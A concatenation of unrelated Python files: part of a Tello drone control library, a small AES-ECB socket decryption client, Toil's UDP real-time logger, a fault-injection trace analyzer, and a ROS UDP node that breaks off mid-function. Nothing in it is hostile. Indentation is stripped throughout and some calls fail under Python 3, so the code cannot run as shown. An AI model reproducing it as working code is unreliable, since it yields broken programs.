Users would normally call one of the move_x functions instead.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
"""
self.send_control_command("{} {}".format(direction, x))
def move_up(self, x: int):
"""Fly x cm up.
Arguments:
x: 20-500
"""
self.move("up", x)
def move_down(self, x: int):
"""Fly x cm down.
Arguments:
x: 20-500
"""
self.move("down", x)
def move_left(self, x: int):
"""Fly x cm left.
Arguments:
x: 20-500
"""
self.move("left", x)
def move_right(self, x: int):
"""Fly x cm right.
Arguments:
x: 20-500
"""
self.move("right", x)
def move_forward(self, x: int):
"""Fly x cm forward.
Arguments:
x: 20-500
"""
self.move("forward", x)
def move_back(self, x: int):
"""Fly x cm backwards.
Arguments:
x: 20-500
"""
self.move("back", x)
def rotate_clockwise(self, x: int):
"""Rotate x degree clockwise.
Arguments:
x: 1-360
"""
self.send_control_command("cw {}".format(x))
def rotate_counter_clockwise(self, x: int):
"""Rotate x degree counter-clockwise.
Arguments:
            x: 1-360
"""
self.send_control_command("ccw {}".format(x))
def flip(self, direction: str):
"""Do a flip maneuver.
Users would normally call one of the flip_x functions instead.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
"""
self.send_control_command("flip {}".format(direction))
def flip_left(self):
"""Flip to the left.
"""
self.flip("l")
def flip_right(self):
"""Flip to the right.
"""
self.flip("r")
def flip_forward(self):
"""Flip forward.
"""
self.flip("f")
def flip_back(self):
"""Flip backwards.
"""
self.flip("b")
def go_xyz_speed(self, x: int, y: int, z: int, speed: int):
"""Fly to x y z relative to the current position.
Speed defines the traveling speed in cm/s.
Arguments:
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
"""
cmd = 'go {} {} {} {}'.format(x, y, z, speed)
self.send_control_command(cmd)
def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the current position
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
x2: -500-500
y1: -500-500
y2: -500-500
z1: -500-500
z2: -500-500
speed: 10-60
"""
cmd = 'curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed)
self.send_control_command(cmd)
def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int):
"""Fly to x y z relative to the mission pad with id mid.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
"""
cmd = 'go {} {} {} {} m{}'.format(x, y, z, speed, mid)
self.send_control_command(cmd)
def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the mission pad with id mid.
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
"""
cmd = 'curve {} {} {} {} {} {} {} m{}'.format(x1, y1, z1, x2, y2, z2, speed, mid)
self.send_control_command(cmd)
def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int):
"""Fly to x y z relative to mid1.
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
"""
cmd = 'jump {} {} {} {} {} m{} m{}'.format(x, y, z, speed, yaw, mid1, mid2)
self.send_control_command(cmd)
def enable_mission_pads(self):
"""Enable mission pad detection
"""
self.send_control_command("mon")
def disable_mission_pads(self):
"""Disable mission pad detection
"""
self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
"""Set mission pad detection direction. enable_mission_pads needs to be
called first. When detecting both directions detecting frequency is 10Hz,
otherwise the detection frequency is 20Hz.
Arguments:
x: 0 downwards only, 1 forwards only, 2 both directions
"""
self.send_control_command("mdirection {}".format(x))
def set_speed(self, x: int):
"""Set speed to x cm/s.
Arguments:
x: 10-100
"""
self.send_control_command("speed {}".format(x))
def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int,
yaw_velocity: int):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
"""
def clamp100(x: int) -> int:
return max(-100, min(100, x))
if time.time() - self.last_rc_control_timestamp > self.TIME_BTW_RC_CONTROL_COMMANDS:
self.last_rc_control_timestamp = time.time()
cmd = 'rc {} {} {} {}'.format(
clamp100(left_right_velocity),
clamp100(forward_backward_velocity),
clamp100(up_down_velocity),
clamp100(yaw_velocity)
)
self.send_command_without_return(cmd)
def set_wifi_credentials(self, ssid, password):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
"""
cmd = 'wifi {} {}'.format(ssid, password)
self.send_command_without_return(cmd)
def connect_to_wifi(self, ssid, password):
"""Connects to the Wi-Fi with SSID and password.
After this command the tello will reboot.
Only works with Tello EDUs.
"""
cmd = 'ap {} {}'.format(ssid, password)
self.send_command_without_return(cmd)
def query_speed(self) -> int:
"""Query speed setting (cm/s)
Returns:
int: 1-100
"""
return self.send_read_command_int('speed?')
def query_battery(self) -> int:
"""Get current battery percentage via a query command
Using get_battery is usually faster
Returns:
int: 0-100 in %
"""
return self.send_read_command_int('battery?')
def query_flight_time(self) -> int:
"""Query current fly time (s).
Using get_flight_time is usually faster.
Returns:
int: Seconds elapsed during flight.
"""
return self.send_read_command_int('time?')
def query_height(self) -> int:
"""Get height in cm via a query command.
Using get_height is usually faster
Returns:
int: 0-3000
"""
return self.send_read_command_int('height?')
def query_temperature(self) -> int:
"""Query temperature (°C).
Using get_temperature is usually faster.
Returns:
int: 0-90
"""
return self.send_read_command_int('temp?')
def query_attitude(self) -> dict:
"""Query IMU attitude data.
Using get_pitch, get_roll and get_yaw is usually faster.
Returns:
{'pitch': int, 'roll': int, 'yaw': int}
"""
response = self.send_read_command('attitude?')
return Tello.parse_state(response)
def query_barometer(self) -> int:
"""Get barometer value (cm)
Using get_barometer is usually faster.
Returns:
int: 0-100
"""
baro = self.send_read_command_int('baro?')
return baro * 100
def query_distance_tof(self) -> float:
"""Get distance value from TOF (cm)
Using get_distance_tof is usually faster.
Returns:
float: 30-1000
"""
# example response: 801mm
tof = self.send_read_command('tof?')
return int(tof[:-2]) / 10
def query_wifi_signal_noise_ratio(self) -> str:
"""Get Wi-Fi SNR
Returns:
str: snr
"""
return self.send_read_command('wifi?')
def query_sdk_version(self) -> str:
"""Get SDK Version
Returns:
str: SDK Version
"""
return self.send_read_command('sdk?')
def query_serial_number(self) -> str:
"""Get Serial Number
Returns:
str: Serial Number
"""
return self.send_read_command('sn?')
def end(self):
"""Call this method when you want to end the tello object
"""
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
host = self.address[0]
if host in drones:
del drones[host]
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
    This class reads frames from a VideoCapture in the background. Use
backgroundFrameRead.frame to get the current frame.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
self.grabbed, self.frame = self.cap.read()
if not self.grabbed or self.frame is None:
raise Exception('Failed to grab first frame from video stream')
self.stopped = False
self.worker = Thread(target=self.update_frame, args=(), daemon=True)
def start(self):
self.worker.start()
def update_frame(self):
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
self.grabbed, self.frame = self.cap.read()
def stop(self):
self.stopped = True
self.worker.join()
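# Hedged usage sketch (illustration only, not part of the library): a minimal
# flight sequence using the Tello class above. It requires a real drone
# reachable over the default Tello Wi-Fi network.
def _example_flight():
    tello = Tello()
    tello.connect()
    Tello.LOGGER.info("Battery: {}%".format(tello.get_battery()))
    tello.takeoff()
    tello.move_up(50)
    tello.rotate_clockwise(90)
    tello.land()
    tello.end()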
|
Client.py
|
import socket
from threading import Thread
from Crypto.Cipher import AES
class Client:
KEY_LEN = 16
AES_ECB_BLOCK_LEN = 16
REQUEST_PORTION = 2**10 * 8
def __init__(self, server_host, server_port):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.unencrypted = bytearray()
self.key = bytes()
self.decipher = None
self.socket.connect((server_host, server_port))
def start_client(self):
self.__get_key()
self.decipher = AES.new(self.key, AES.MODE_ECB)
Thread(target=self.__decrypt_loop).start()
def __get_key(self):
while len(self.key) != Client.KEY_LEN:
data = self.socket.recv(Client.KEY_LEN)
if len(data) > Client.KEY_LEN - len(self.key):
self.unencrypted += data[Client.KEY_LEN - len(self.key):]
self.key += data[:Client.KEY_LEN - len(self.key)]
else:
self.key += data
print('Out')
def __decrypt_loop(self):
while 1:
self.unencrypted += self.socket.recv(Client.REQUEST_PORTION)
data_length = len(self.unencrypted)
size_to_decrypt = data_length - data_length % Client.AES_ECB_BLOCK_LEN
decrypted_data = self.decipher.decrypt(self.unencrypted[:size_to_decrypt])
self.unencrypted = self.unencrypted[size_to_decrypt:]
self.socket.send(decrypted_data)
print('Work!')
|
realtimeLogger.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Implements a real-time UDP-based logging system that user scripts can use for debugging.
"""
from __future__ import absolute_import
import os
import os.path
import json
import logging
import logging.handlers
import socket
import threading
# Python 3 compatibility imports
from six.moves import socketserver as SocketServer
import toil.lib.bioio
log = logging.getLogger(__name__)
class LoggingDatagramHandler(SocketServer.BaseRequestHandler):
"""
Receive logging messages from the jobs and display them on the leader.
Uses bare JSON message encoding.
"""
def handle(self):
"""
Handle a single message. SocketServer takes care of splitting out the messages.
Messages are JSON-encoded logging module records.
"""
# Unpack the data from the request
data, socket = self.request
try:
# Parse it as JSON
message_attrs = json.loads(data)
# Fluff it up into a proper logging record
record = logging.makeLogRecord(message_attrs)
except:
# Complain someone is sending us bad logging data
logging.error("Malformed log message from {}".format(self.client_address[0]))
else:
# Log level filtering should have been done on the remote end. The handle() method
# skips it on this end.
log.handle(record)
class JSONDatagramHandler(logging.handlers.DatagramHandler):
"""
Send logging records over UDP serialized as JSON.
They have to fit in a single UDP datagram, so don't try to log more than 64kb at once.
"""
def makePickle(self, record):
"""
Actually, encode the record as bare JSON instead.
"""
return json.dumps(record.__dict__)
class RealtimeLoggerMetaclass(type):
"""
Metaclass for RealtimeLogger that lets you do things like RealtimeLogger.warning(),
RealtimeLogger.info(), etc.
"""
def __getattr__(self, name):
"""
If a real attribute can't be found, try one of the logging methods on the actual logger
object.
"""
return getattr(self.getLogger(), name)
class RealtimeLogger(object):
"""
Provides a logger that logs over UDP to the leader. To use in a Toil job, do:
>>> from toil.realtimeLogger import RealtimeLogger
>>> RealtimeLogger.info("This logging message goes straight to the leader")
That's all a user of Toil would need to do. On the leader, Job.Runner.startToil()
automatically starts the UDP server by using an instance of this class as a context manager.
"""
# Enable RealtimeLogger.info() syntactic sugar
__metaclass__ = RealtimeLoggerMetaclass
# The names of all environment variables used by this class are prefixed with this string
envPrefix = "TOIL_RT_LOGGING_"
# Avoid duplicating the default level everywhere
defaultLevel = 'INFO'
# State maintained on server and client
lock = threading.RLock()
# Server-side state
# The leader keeps a server and thread
loggingServer = None
serverThread = None
initialized = 0
# Client-side state
logger = None
@classmethod
def _startLeader(cls, batchSystem, level=defaultLevel):
with cls.lock:
if cls.initialized == 0:
cls.initialized += 1
if level:
log.info('Starting real-time logging.')
# Start up the logging server
cls.loggingServer = SocketServer.ThreadingUDPServer(
server_address=('0.0.0.0', 0),
RequestHandlerClass=LoggingDatagramHandler)
# Set up a thread to do all the serving in the background and exit when we do
cls.serverThread = threading.Thread(target=cls.loggingServer.serve_forever)
cls.serverThread.daemon = True
cls.serverThread.start()
# Set options for logging in the environment so they get sent out to jobs
fqdn = socket.getfqdn()
try:
ip = socket.gethostbyname(fqdn)
except socket.gaierror:
# FIXME: Does this only happen for me? Should we librarize the work-around?
import platform
if platform.system() == 'Darwin' and '.' not in fqdn:
ip = socket.gethostbyname(fqdn + '.local')
else:
raise
port = cls.loggingServer.server_address[1]
def _setEnv(name, value):
name = cls.envPrefix + name
os.environ[name] = value
batchSystem.setEnv(name)
_setEnv('ADDRESS', '%s:%i' % (ip, port))
_setEnv('LEVEL', level)
else:
log.info('Real-time logging disabled')
else:
if level:
log.warn('Ignoring nested request to start real-time logging')
@classmethod
def _stopLeader(cls):
"""
Stop the server on the leader.
"""
with cls.lock:
assert cls.initialized > 0
cls.initialized -= 1
if cls.initialized == 0:
if cls.loggingServer:
log.info('Stopping real-time logging server.')
cls.loggingServer.shutdown()
cls.loggingServer = None
if cls.serverThread:
log.info('Joining real-time logging server thread.')
cls.serverThread.join()
cls.serverThread = None
                for k in list(os.environ.keys()):
if k.startswith(cls.envPrefix):
os.environ.pop(k)
@classmethod
def getLogger(cls):
"""
Get the logger that logs real-time to the leader.
Note that if the returned logger is used on the leader, you will see the message twice,
since it still goes to the normal log handlers, too.
"""
# Only do the setup once, so we don't add a handler every time we log. Use a lock to do
# so safely even if we're being called in different threads. Use double-checked locking
# to reduce the overhead introduced by the lock.
if cls.logger is None:
with cls.lock:
if cls.logger is None:
cls.logger = logging.getLogger('toil-rt')
try:
level = os.environ[cls.envPrefix + 'LEVEL']
except KeyError:
# There is no server running on the leader, so suppress most log messages
# and skip the UDP stuff.
cls.logger.setLevel(logging.CRITICAL)
else:
# Adopt the logging level set on the leader.
toil.lib.bioio.setLogLevel(level, cls.logger)
try:
address = os.environ[cls.envPrefix + 'ADDRESS']
except KeyError:
pass
else:
# We know where to send messages to, so send them.
host, port = address.split(':')
cls.logger.addHandler(JSONDatagramHandler(host, int(port)))
return cls.logger
def __init__(self, batchSystem, level=defaultLevel):
"""
A context manager that starts up the UDP server.
Should only be invoked on the leader. Python logging should have already been configured.
This method takes an optional log level, as a string level name, from the set supported
by bioio. If the level is None, False or the empty string, real-time logging will be
disabled, i.e. no UDP server will be started on the leader and log messages will be
suppressed on the workers. Note that this is different from passing level='OFF',
which is equivalent to level='CRITICAL' and does not disable the server.
"""
super(RealtimeLogger, self).__init__()
self.__level = level
self.__batchSystem = batchSystem
def __enter__(self):
RealtimeLogger._startLeader(self.__batchSystem, level=self.__level)
# noinspection PyUnusedLocal
def __exit__(self, exc_type, exc_val, exc_tb):
RealtimeLogger._stopLeader()
|
SBFI_Analyzer.py
|
# Multithreaded analysis of observation dumps (from toolconf.result_dir)
# Interacts with datamodel
# With respect to SQL database - fills the table 'Injections'
# Renames dumps according to global unique key, stores them into zip package
# Author: Ilya Tuzov, Universitat Politecnica de Valencia
import sys
import xml.etree.ElementTree as ET
import re
import os
import stat
import subprocess
import shutil
import datetime
import time
import random
import glob
import threading
from threading import Thread
from Davos_Generic import *
from Datamanager import *
EnhancedAnalysisOfLatentErrors = False
def check_outputs(ref_trace, inj_trace, time_window, mode, max_time_violation):
"""
Locates mismatches on DUT outputs (any mismatch is treated as DUT failure)
Args:
mode ():
ref_trace ():
inj_trace ():
time_window ():
Returns:
dictionary: key='DomainLabel', val= [number of mismatches, time of first mismatch]
"""
res = dict((k, [0, None]) for k in ref_trace.domain_indices.keys())
time_points = sorted(list(set([i.time for i in ref_trace.vectors + inj_trace.vectors
if (i.time >= time_window[0])])))
if mode == TraceCheckModes.MAV:
for t in time_points:
ref_v = ref_trace.get_vector_by_time(t, None)
inj_v = inj_trace.get_vector_by_time(t, None)
for k, v in ref_trace.domain_indices.items():
for i in v:
if ref_v.outputs[i] != inj_v.outputs[i]:
res[k][0] += 1
if res[k][1] is None:
res[k][1] = t
break
elif mode == TraceCheckModes.MLV and len(time_points) > 0:
ref_v = ref_trace.get_vector_by_time(time_points[-1], None)
inj_v = inj_trace.get_vector_by_time(time_points[-1], None)
for k, v in ref_trace.domain_indices.items():
for i in v:
if ref_v.outputs[i] != inj_v.outputs[i]:
res[k][0] = 1
res[k][1] = time_points[-1]
break
return res
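# Illustrative result shape (hypothetical values): with two output domains 'A'
# and 'B', check_outputs() may return {'A': [0, None], 'B': [3, 1250.0]},
# meaning domain 'B' mismatched 3 times, with the first mismatch at simulation time 1250.0.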
def check_tmr(ref_trace, inj_trace, time_window, mode, max_time_violation):
if len(ref_trace.domain_indices.keys()) < 3:
        print('SBFI analyzer error: number of domains ({0}) is less than required for TMR'.format(len(ref_trace.domain_indices)))
return None
time_points = sorted(list(set([i.time for i in ref_trace.vectors + inj_trace.vectors
if (i.time >= time_window[0])])))
ref_v = ref_trace.get_vector_by_time(time_points[-1], None)
inj_v = inj_trace.get_vector_by_time(time_points[-1], None)
tmr_match = True
m1, m2, m3 = 0, 0, 0
t1, t2, t3 = None, None, None
domains = sorted(ref_trace.domain_indices.keys())
rsize = len(ref_trace.domain_indices[domains[0]])
for item_id in range(rsize):
i1, i2, i3 = ref_trace.domain_indices[domains[0]][item_id], ref_trace.domain_indices[domains[1]][item_id], ref_trace.domain_indices[domains[2]][item_id]
h1, h2, h3 = int(inj_v.outputs[i1], 16), int(inj_v.outputs[i2], 16), int(inj_v.outputs[i3], 16)
if h1 != int(ref_v.outputs[i1], 16):
m1 += 1
if t1 is None: t1 = time_points[-1]
if h2 != int(ref_v.outputs[i2], 16):
m2 += 1
if t2 is None: t2 = time_points[-1]
if h3 != int(ref_v.outputs[i3], 16):
m3 += 1
if t3 is None: t3 = time_points[-1]
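        # Bitwise majority vote across the three redundant domains: each bit of
        # `voted` is set iff at least two of h1, h2, h3 have that bit set.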
voted = (h1 & h2) | (h1 & h3) | (h2 & h3)
if voted != int(ref_v.outputs[i1], 16):
tmr_match = False
return {domains[0]: (m1, t1), domains[1]: (m2, t2), domains[2]: (m3, t3)}, tmr_match
def count_latent_errors(ref_trace, inj_trace, time_window):
mismatches = 0
# time_points = sorted(list(set([i.time for i in ref_trace.vectors + inj_trace.vectors
# if (i.time >= time_window[0]) and (i.time <= time_window[1])])))
time_points = sorted(list(set([i.time for i in ref_trace.vectors + inj_trace.vectors
if (i.time >= time_window[0])])))
if len(time_points) > 0:
ref_v = ref_trace.get_vector_by_time(time_points[-1], None)
inj_v = inj_trace.get_vector_by_time(time_points[-1], None)
for i in range(len(ref_v.internals)):
if ref_v.internals[i] != inj_v.internals[i]:
mismatches += 1
return mismatches
def process_dumps_in_linst(config, toolconf, conf, datamodel, DescItems, baseindex):
model = datamodel.GetHdlModel(conf.label)
basetime = datamodel.reference.reference_dump.vectors[-1].time - conf.workload_time
ExpDescIdCnt = baseindex
tw = config.SBFI.analyzer.time_window if config.SBFI.analyzer.time_window is not None else (datamodel.reference.reference_dump.vectors[0].time, datamodel.reference.reference_dump.vectors[-1].time)
print("Analysis of traces, time window: {0}".format(str(tw)))
err_signal_index = None, None
if config.SBFI.analyzer.error_flag_signal != '':
if '{{{0}}}'.format(config.SBFI.analyzer.error_flag_signal) in datamodel.reference.reference_dump.internal_labels:
err_signal_index = 0, datamodel.reference.reference_dump.internal_labels.index('{{{0}}}'.format(config.SBFI.analyzer.error_flag_signal))
elif '{{{0}}}'.format(config.SBFI.analyzer.error_flag_signal) in datamodel.reference.reference_dump.output_labels:
err_signal_index = 1, datamodel.reference.reference_dump.output_labels.index('{{{0}}}'.format(config.SBFI.analyzer.error_flag_signal))
for item in DescItems:
if ExpDescIdCnt % 10 == 0:
sys.stdout.write("\r%s: Processing dump: %6i" % (conf.label, ExpDescIdCnt))
sys.stdout.flush()
target = datamodel.GetOrAppendTarget(item.target, item.instance_type, item.injection_case)
InjDesc = InjectionDescriptor()
InjDesc.ID = ExpDescIdCnt
InjDesc.ModelID = model.ID
InjDesc.TargetID = target.ID
InjDesc.FaultModel = item.fault_model
InjDesc.ForcedValue = item.forced_value
InjDesc.InjectionTime = item.injection_time
InjDesc.InjectionDuration = item.duration
InjDesc.ObservationTime = item.observation_time
InjDesc.Node = item.target
InjDesc.InjCase = item.injection_case
InjDesc.DomainMatch = {}
for k in datamodel.reference.reference_dump.domain_indices.keys():
InjDesc.DomainMatch[k] = '-'
inj_dump = simDump()
inj_dump.set_labels_copy(datamodel.reference.initial_internal_labels, datamodel.reference.initial_output_labels)
        if inj_dump.build_vectors_from_file(os.path.join(conf.work_dir, toolconf.result_dir, item.dumpfile)) is None:
InjDesc.Status = 'E' # error
else:
InjDesc.Status = 'S' # Simulation successful and dumpfile exists
err_raised = False
if err_signal_index[0] is not None:
for v in inj_dump.vectors:
if err_signal_index[0] == 0:
if v.internals[err_signal_index[1]] == config.SBFI.analyzer.error_flag_active_value:
err_raised = True
break
elif err_signal_index[0] == 1:
if v.outputs[err_signal_index[1]] == config.SBFI.analyzer.error_flag_active_value:
err_raised = True
break
InjDesc.ErrorCount = count_latent_errors(datamodel.reference.reference_dump, inj_dump, tw)
InjDesc.FaultToFailureLatency = float(0)
if config.SBFI.analyzer.domain_mode.upper() in ['', 'SIMPLEX']:
output_match_res = check_outputs(datamodel.reference.reference_dump, inj_dump, tw, config.SBFI.analyzer.mode, config.SBFI.analyzer.max_time_violation)
for k, v in output_match_res.items():
InjDesc.DomainMatch[k] = 'V' if v[0] == 0 else 'X'
out_misnum = sum(v[0] for k, v in output_match_res.items())
if out_misnum > 0:
first_mismatch = min(v[1] for k, v in output_match_res.items() if v[1] is not None)
InjDesc.FaultToFailureLatency = first_mismatch - basetime - float(InjDesc.InjectionTime)
if InjDesc.FaultToFailureLatency < 0: InjDesc.FaultToFailureLatency = float(0)
# Determine failure mode
if out_misnum == 0:
if InjDesc.ErrorCount == 0:
InjDesc.FailureMode = 'M' # Masked fault
else:
InjDesc.FailureMode = 'L' # Latent fault
else:
if err_raised:
InjDesc.FailureMode = 'S' # Signaled Failure
else:
InjDesc.FailureMode = 'C' # Silent Data Corruption
elif config.SBFI.analyzer.domain_mode.upper() in ['TMR']:
output_match_res, tmr_match = check_tmr(datamodel.reference.reference_dump, inj_dump, tw, config.SBFI.analyzer.mode, config.SBFI.analyzer.max_time_violation)
for k, v in output_match_res.items():
InjDesc.DomainMatch[k] = 'V' if v[0] == 0 else 'X'
if not tmr_match:
InjDesc.FailureMode = 'C'
first_mismatch = min(v[1] for k, v in output_match_res.items() if v[1] is not None)
InjDesc.FaultToFailureLatency = first_mismatch - basetime - float(InjDesc.InjectionTime)
elif sum(i == 'V' for i in InjDesc.DomainMatch.values()) < 3:
InjDesc.FailureMode = 'L' # Latent fault
else:
InjDesc.FailureMode = 'M' # Masked fault
# rename dumpfile to string of unique index {InjDesc.ID}.lst
InjDesc.Dumpfile = '{0:010d}.lst'.format(InjDesc.ID)
src = os.path.normpath(os.path.join(conf.work_dir, toolconf.result_dir, item.dumpfile))
dst = os.path.normpath(os.path.join(conf.work_dir, 'irespack', InjDesc.Dumpfile))
if os.path.exists(src): shutil.copy(src, dst)
datamodel.LaunchedInjExp_dict[InjDesc.ID] = InjDesc
ExpDescIdCnt += 1
def process_dumps(config, toolconf, conf, datamodel):
timestart = datetime.datetime.now().replace(microsecond=0)
os.chdir(conf.work_dir)
packdir = os.path.join(conf.work_dir, 'irespack')
if os.path.exists(packdir): shutil.rmtree(packdir)
os.mkdir(packdir)
shutil.copy(os.path.normpath(os.path.join(conf.work_dir, toolconf.result_dir, toolconf.reference_file)), os.path.normpath(os.path.join(packdir, toolconf.reference_file)))
datamodel.reference.reference_dump = simDump()
datamodel.reference.reference_dump.build_labels_from_file(os.path.normpath(os.path.join(conf.work_dir, toolconf.list_init_file)), config.SBFI.analyzer.rename_list)
datamodel.reference.reference_dump.normalize_array_labels(os.path.normpath(os.path.join(conf.work_dir, toolconf.result_dir, toolconf.reference_file)))
datamodel.reference.reference_dump.build_vectors_from_file(os.path.normpath(os.path.join(conf.work_dir, toolconf.result_dir, toolconf.reference_file)))
datamodel.reference.initial_internal_labels, datamodel.reference.initial_output_labels = datamodel.reference.reference_dump.get_labels_copy()
datamodel.reference.JnGrLst = config.SBFI.analyzer.join_group_list.copy()
datamodel.reference.reference_dump.join_output_columns(datamodel.reference.JnGrLst.copy())
desctable = ExpDescTable(conf.label)
desctable.build_from_csv_file(os.path.normpath(os.path.join(conf.work_dir, toolconf.result_dir, toolconf.exp_desc_file)), "Other")
print('Processing simulation traces')
progress = 0
for i in desctable.items:
target = datamodel.GetOrAppendTarget(i.target, i.instance_type, i.injection_case)
progress += 1
if progress % 100 == 0:
sys.stdout.write('Targets appended: {0:06d}\r'.format(progress))
# Prepare multithreaded analysis of dumps
threadnum = config.SBFI.analyzer.threads
ExpDescIdCnt = datamodel.GetMaxKey(DataDescriptors.InjectionExp) + 1
threadlist = []
    step = (len(desctable.items) // threadnum) + 1
index = 0
while index < len(desctable.items):
if index + step <= len(desctable.items):
items = desctable.items[index:index + step]
else:
items = desctable.items[index:]
baseindex = ExpDescIdCnt + index
print('Starting analysis thread: {0} + {1}'.format(str(baseindex), str(len(items))))
t = Thread(target=process_dumps_in_linst, args=(config, toolconf, conf, datamodel, items, baseindex))
threadlist.append(t)
index += step
for t in threadlist:
t.start()
for t in threadlist:
t.join()
datamodel.SaveTargets()
datamodel.SaveInjections()
injsummary = datamodel.LaunchedInjExp_dict.values()
domains = sorted(injsummary[0].DomainMatch.keys())
T = Table('SummaryFaultSim', ['Node', 'InjCase', 'InjTime', 'Duration', 'FailureMode'] + domains)
for i in range(len(injsummary)):
T.add_row()
T.put(i, T.labels.index('Node'), injsummary[i].Node)
T.put(i, T.labels.index('InjCase'), injsummary[i].InjCase)
T.put(i, T.labels.index('InjTime'), injsummary[i].InjectionTime)
T.put(i, T.labels.index('Duration'), injsummary[i].InjectionDuration)
T.put(i, T.labels.index('FailureMode'), injsummary[i].FailureMode)
for k in domains:
T.put(i, T.labels.index(k), injsummary[i].DomainMatch[k])
with open(os.path.join(config.report_dir, 'Summary_{0}_{1}.csv'.format(config.experiment_label, conf.label)), 'w') as f:
f.write(T.to_csv())
datamodel.LaunchedInjExp_dict.clear()
dumppack = "RESPACK_{0}.zip".format(conf.label)
os.chdir(conf.work_dir)
zip_folder(packdir, os.path.join(config.report_dir, dumppack))
zip_folder(toolconf.code_dir, os.path.join(config.report_dir, dumppack))
shutil.rmtree(packdir)
domain_stats = {}
valid_exp = sum(i.Status == 'S' for i in injsummary)
failures = sum(i.FailureMode == 'C' for i in injsummary)
for i in range(len(injsummary)):
for k in domains:
if k not in domain_stats:
domain_stats[k] = 0
if injsummary[i].DomainMatch[k] == 'X':
domain_stats[k] += 1
with open(os.path.join(config.report_dir, 'Statistics.log'), 'a') as f:
f.write('\n{0:30s}: Failures: {1:5d}/{2:5d}: {3}'.format(conf.label,
failures, valid_exp,
'; '.join(['{0:10s}:{1:5d}'.format(k, domain_stats[k]) for k in sorted(domain_stats.keys())])))
    print('\n\nAnalysis completed, time taken: ' + str(time_to_seconds(datetime.datetime.now().replace(microsecond=0) - timestart)))
|
rosnode_meridim_demo_dpg.py
|
# #!/usr/bin/python3
# coding: UTF-8
# or #!/usr/bin/env python etc., depending on your environment
#from _typeshed import IdentityFunction
from re import I
from yaml.tokens import TagToken
import rospy
from sensor_msgs.msg import JointState
import numpy as np
import socket
from contextlib import closing
import struct
import math
import dearpygui.dearpygui as dpg
import threading
import signal
UDP_RESV_IP="192.168.1.xx" # IP address of this PC
UDP_RESV_PORT=22222 # receive port
UDP_SEND_IP="192.168.1.xx" # IP address of the destination ESP32
UDP_SEND_PORT=22224 # send port
MSG_SIZE = 90
MSG_BUFF = MSG_SIZE * 2
UPDATE_YAW_CENTER_FLAG = 0
UPDATE_YAW_CENTER_NUM = 102
sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) # socket setup for UDP
sock.bind((UDP_RESV_IP,UDP_RESV_PORT))
data2 = []
loop_count = 0
error_count = 0
flag_stop = 0
r_short_data_disp=list(range(MSG_SIZE))
message0 = "This PC's IP address is "+UDP_RESV_IP
message1 = ""
button = "button"
def main():
global message
global message0
global message1
while not rospy.is_shutdown():
message1 = "Waiting for UDP data from "+UDP_SEND_IP+"..."
with closing(sock):
while True:
global loop_count
global r_short_data_disp
loop_count += 1
r_bin_data,addr = sock.recvfrom(1472)
#sock.sendto(r_bin_data,(UDP_SEND_IP,UDP_SEND_PORT))
r_short_data=struct.unpack('90h',r_bin_data)
#print(r_short_data)
message1 = "UDP data receiving from "+UDP_SEND_IP+"."
checksum = np.array([0], dtype=np.int16)
for i in range(MSG_SIZE-2):
checksum[0] += r_short_data[i]
r_short_data_disp[i]=r_short_data[i]
checksum[0] = ~checksum[0] & 0xffff
#print("[Calc] ",checksum[0])
#print("[Ans ] ",r_short_data[MSG_SIZE-1])
#r_short_data[MSG_SIZE-1]=checksum[0]
if checksum[0] == r_short_data[MSG_SIZE-1]:
joint_pub = rospy.Publisher('joint_states', JointState, queue_size=10)
rospy.init_node('joint_state_publisher_meridim')
rate = rospy.Rate(500) # 500hz
js_meridim = JointState()
